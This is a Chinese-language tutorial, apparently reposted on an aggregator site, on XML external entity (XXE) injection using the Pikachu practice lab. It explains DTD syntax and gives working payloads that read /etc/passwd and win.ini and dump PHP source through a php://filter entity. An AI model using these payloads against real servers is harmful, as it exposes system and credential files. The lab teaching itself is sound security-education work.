XXE -"xml external entity injection"
既"xml外部實體注入漏洞"。

概括一下就是"攻擊者通過向服務器注入指定的xml實體內容，從而讓服務器按照指定的配置進行執行，導致問題"

也就是說服務端接收和解析了來自用戶端的xml數據，而又沒有做嚴格的安全控制，從而導致xml外部實體注入。

具體的關于xml實體的介紹,網絡上有很多,自己動手先查一下。
現在很多語言里面對應的解析xml的函數默認是禁止解析外部實體內容的，從而也就直接避免了這個漏洞。

以PHP為例，在PHP里面解析xml用的是libxml，其在>=2.9.0的版本中，默認是禁止解析xml外部實體內容的。

?

第一部分：XML聲明部分

<?xml version="1.0"?>

第二部分: 文檔類型定義DTD

<!DOCTYPE note[<!-- 定義此文檔是note類型的文檔--><!ENTITY entity-name SYSTEM "URI/URL"><!--外部實體聲明--> ]>

第三部分：文檔元素

<note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body> </note>

其中，DTD（Document Type Definition，文檔類型定義），用來為?XML?文檔定義語法約束，可以是內部申明也可以使引用外部DTD現在很多語言里面對應的解析xml的函數默認是禁止解析外部實體內容的，從而也就直接避免了這個漏洞。

1.內部申明DTD格式<!DOCTYPE 根元素 [元素申明]>

2.外部引用DTD格式<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">

3.引用公共DTD格式<!DOCTYPE 根元素 PUBLIC "DTD標識名" "公共DTD的URI">

外部實體引用Payload

<?xml version="1.0"?><DOCTYPE ANY [<!ENTITY f SYSTEM "file:///etc/passwd">]> <x>&f;</x>

1.PHP中有一個函數 simplexml_load_string()將形式良好的xml字符串轉換為SimpleXMLElement對象;

在PHP里面解析xml用的是libxml,其在>=2.9.0的版本中，

默認是禁止解析xml外部實體內容的。

本章提供的案例中，為了模擬漏洞，Pikachu平臺手動指定LIBXML_NOENT選項開啟了xml外部實體解析。

2.先提交一個正常的xml數據

<?xml version="1.0"?><!DOCTYPE note [<!ENTITY hacker "test"> ]><name>&hacker;</name>

3.如果我們提交下面這樣的payload，就能看到服務器上的文件內容

<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///C://Windows//win.ini"> ]><x>&f;</x>

4.嘗試php偽協議，打印出了base64編碼后的xxe.php頁面,

<?xml version="1.0"?><!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]><x>&f;</x>

總結

以上是生活随笔為你收集整理的Pikachu-XXE(xml外部实体注入漏洞)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。